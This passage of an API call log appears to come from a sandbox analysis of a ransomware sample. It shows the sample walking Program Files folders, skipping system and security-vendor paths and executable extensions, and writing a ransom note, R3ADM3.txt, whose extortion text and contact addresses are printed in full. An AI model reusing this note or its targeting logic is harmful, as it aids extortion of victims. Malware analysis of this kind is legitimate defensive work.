0x0 [0138.014] StrStrIW (lpFirst="ADO.NET", lpSrch="Boot") returned 0x0 [0138.014] StrStrIW (lpFirst="ADO.NET", lpSrch="Windows") returned 0x0 [0138.014] StrStrIW (lpFirst="ADO.NET", lpSrch="Trend Micro") returned 0x0 [0138.014] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee518 [0138.014] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee608 [0138.014] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xedab30 [0138.014] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee608 | out: hHeap=0xea0000) returned 1 [0138.014] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee518 | out: hHeap=0xea0000) returned 1 [0138.014] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6790 [0138.014] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd658 [0138.014] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0138.014] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57f7f2f0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x57f7f2f0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57f7f2f0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0138.014] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0138.014] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0138.014] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0138.014] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0138.014] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0138.014] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0138.015] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0138.015] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0138.015] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0138.015] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57f7f2f0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x57f7f2f0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57f7f2f0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0138.015] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee5378 | out: hHeap=0xea0000) returned 1 [0138.015] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee67b8 | out: hHeap=0xea0000) returned 1 [0138.015] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0138.015] Sleep (dwMilliseconds=0x32) [0138.080] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee590 | out: hHeap=0xea0000) returned 1 [0138.080] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee4a0 | out: hHeap=0xea0000) returned 1 [0138.080] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc00 [0138.080] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcdb0 [0138.080] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc858 [0138.080] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcdb0 | out: hHeap=0xea0000) returned 1 [0138.080] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcdb0 [0138.080] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee67b8 [0138.080] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0138.080] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xeed3a8 [0138.080] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeebe10 [0138.080] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed3a8 | out: hHeap=0xea0000) returned 1 [0138.080] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0138.081] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee67b8 | out: hHeap=0xea0000) returned 1 [0138.081] CreateFileW (lpFileName="C:\\Program Files\\MSBuild\\R3ADM3.txt" (normalized: "c:\\program files\\msbuild\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0138.081] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0138.081] WriteFile (in: hFile=0x6c4, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0138.082] CloseHandle (hObject=0x6c4) returned 1 [0138.083] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe10 | out: hHeap=0xea0000) returned 1 [0138.083] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcdb0 | out: hHeap=0xea0000) returned 1 [0138.083] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSBuild\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5803d9d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5803d9d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0138.083] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0138.083] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5803d9d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5803d9d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.083] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0138.083] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0138.083] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe27a0e50, ftCreationTime.dwHighDateTime=0x1d5d2ae, ftLastAccessTime.dwLowDateTime=0x15550e00, ftLastAccessTime.dwHighDateTime=0x1d573dd, ftLastWriteTime.dwLowDateTime=0x15550e00, ftLastWriteTime.dwHighDateTime=0x1d573dd, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="foxmailincmail.exe", cAlternateFileName="FOXMAI~1.EXE")) returned 1 [0138.083] lstrcmpW (lpString1="foxmailincmail.exe", lpString2=".") returned 1 [0138.083] lstrcmpW (lpString1="foxmailincmail.exe", lpString2="..") returned 1 [0138.083] StrStrIW (lpFirst="foxmailincmail.exe", lpSrch=".UAKXC") returned 0x0 [0138.083] StrStrIW (lpFirst="foxmailincmail.exe", lpSrch=".exe") returned=".exe" [0138.083] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0138.083] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0138.084] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0138.084] StrStrIW (lpFirst="Microsoft", lpSrch="tmp") returned 0x0 [0138.084] StrStrIW (lpFirst="Microsoft", lpSrch="winnt") returned 0x0 [0138.084] StrStrIW (lpFirst="Microsoft", lpSrch="temp") returned 0x0 [0138.084] StrStrIW (lpFirst="Microsoft", lpSrch="thumb") returned 0x0 [0138.084] StrStrIW (lpFirst="Microsoft", lpSrch="$Recycle.Bin") returned 0x0 [0138.084] StrStrIW (lpFirst="Microsoft", lpSrch="$RECYCLE.BIN") returned 0x0 [0138.084] StrStrIW (lpFirst="Microsoft", lpSrch="System Volume Information") returned 0x0 [0138.084] StrStrIW (lpFirst="Microsoft", lpSrch="Boot") returned 0x0 [0138.084] StrStrIW (lpFirst="Microsoft", lpSrch="Windows") returned 0x0 [0138.084] StrStrIW (lpFirst="Microsoft", lpSrch="Trend Micro") returned 0x0 [0138.084] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee67b8 [0138.084] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcdb0 [0138.084] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0138.084] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeebe10 [0138.084] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0138.084] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcdb0 | out: hHeap=0xea0000) returned 1 [0138.084] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee67b8 | out: hHeap=0xea0000) returned 1 [0138.084] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee67b8 [0138.084] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec31e0 [0138.085] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe10 | out: hHeap=0xea0000) returned 1 [0138.085] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5803d9d0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5803d9d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5803d9d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0138.085] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0138.085] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0138.085] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0138.085] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0138.085] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0138.085] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0138.085] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0138.085] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0138.085] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0138.085] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5803d9d0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5803d9d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5803d9d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0138.085] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc2b8 | out: hHeap=0xea0000) returned 1 [0138.085] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee67e0 | out: hHeap=0xea0000) returned 1 [0138.085] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0138.085] Sleep (dwMilliseconds=0x32) [0138.139] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc858 | out: hHeap=0xea0000) returned 1 [0138.139] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc00 | out: hHeap=0xea0000) returned 1 [0138.139] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3028 [0138.139] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d10 [0138.139] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2a50 [0138.139] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2d10 | out: hHeap=0xea0000) returned 1 [0138.139] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d10 [0138.140] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee67e0 [0138.140] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2cb8 [0138.140] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3340 [0138.140] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0138.140] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3340 | out: hHeap=0xea0000) returned 1 [0138.140] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2cb8 | out: hHeap=0xea0000) returned 1 [0138.140] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee67e0 | out: hHeap=0xea0000) returned 1 [0138.140] CreateFileW (lpFileName="C:\\Program Files\\Reference Assemblies\\R3ADM3.txt" (normalized: "c:\\program files\\reference assemblies\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0138.141] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0138.141] WriteFile (in: hFile=0x6c4, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0138.142] CloseHandle (hObject=0x6c4) returned 1 [0138.142] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0138.142] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2d10 | out: hHeap=0xea0000) returned 1 [0138.142] FindFirstFileW (in: lpFileName="C:\\Program Files\\Reference Assemblies\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x580d5f50, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x580d5f50, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0138.143] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0138.143] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x580d5f50, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x580d5f50, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.143] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0138.143] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0138.143] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0138.143] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0138.143] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0138.143] StrStrIW (lpFirst="Microsoft", lpSrch="tmp") returned 0x0 [0138.143] StrStrIW (lpFirst="Microsoft", lpSrch="winnt") returned 0x0 [0138.143] StrStrIW (lpFirst="Microsoft", lpSrch="temp") returned 0x0 [0138.143] StrStrIW (lpFirst="Microsoft", lpSrch="thumb") returned 0x0 [0138.143] StrStrIW (lpFirst="Microsoft", lpSrch="$Recycle.Bin") returned 0x0 [0138.143] StrStrIW (lpFirst="Microsoft", lpSrch="$RECYCLE.BIN") returned 0x0 [0138.143] StrStrIW (lpFirst="Microsoft", lpSrch="System Volume Information") returned 0x0 [0138.143] StrStrIW (lpFirst="Microsoft", lpSrch="Boot") returned 0x0 [0138.143] StrStrIW (lpFirst="Microsoft", lpSrch="Windows") returned 0x0 [0138.143] StrStrIW (lpFirst="Microsoft", lpSrch="Trend Micro") returned 0x0 [0138.143] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee67e0 [0138.143] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d10 [0138.143] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2cb8 [0138.143] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0138.143] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2cb8 | out: hHeap=0xea0000) returned 1 [0138.143] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2d10 | out: hHeap=0xea0000) returned 1 [0138.144] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee67e0 | out: hHeap=0xea0000) returned 1 [0138.144] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee67e0 [0138.144] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebe10 [0138.144] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0138.144] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x580d5f50, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x580d5f50, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x580d5f50, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0138.144] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0138.144] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0138.144] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0138.144] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0138.144] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0138.144] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0138.144] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0138.144] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0138.144] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0138.144] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x580d5f50, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x580d5f50, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x580d5f50, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0138.144] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2e18 | out: hHeap=0xea0000) returned 1 [0138.144] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6808 | out: hHeap=0xea0000) returned 1 [0138.144] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0138.144] Sleep (dwMilliseconds=0x32) [0138.205] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2a50 | out: hHeap=0xea0000) returned 1 [0138.205] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3028 | out: hHeap=0xea0000) returned 1 [0138.205] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3028 [0138.205] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2a50 [0138.205] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebe78 [0138.205] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2a50 | out: hHeap=0xea0000) returned 1 [0138.205] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2a50 [0138.205] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6808 [0138.205] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2e18 [0138.205] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d10 [0138.205] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0138.205] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2d10 | out: hHeap=0xea0000) returned 1 [0138.205] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2e18 | out: hHeap=0xea0000) returned 1 [0138.205] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6808 | out: hHeap=0xea0000) returned 1 [0138.206] CreateFileW (lpFileName="C:\\Program Files\\Uninstall Information\\R3ADM3.txt" (normalized: "c:\\program files\\uninstall information\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0138.206] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0138.206] WriteFile (in: hFile=0x6c4, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0138.207] CloseHandle (hObject=0x6c4) returned 1 [0138.208] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0138.208] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2a50 | out: hHeap=0xea0000) returned 1 [0138.208] FindFirstFileW (in: lpFileName="C:\\Program Files\\Uninstall Information\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x4232b3dd, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x5816e4d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5816e4d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0138.208] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0138.208] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x4232b3dd, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x5816e4d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5816e4d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.208] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0138.208] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0138.208] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5816e4d0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5816e4d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5816e4d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0138.208] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0138.208] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0138.208] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0138.208] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0138.208] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0138.209] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0138.209] StrStrIW (lpFirst="R3ADM3.txt", 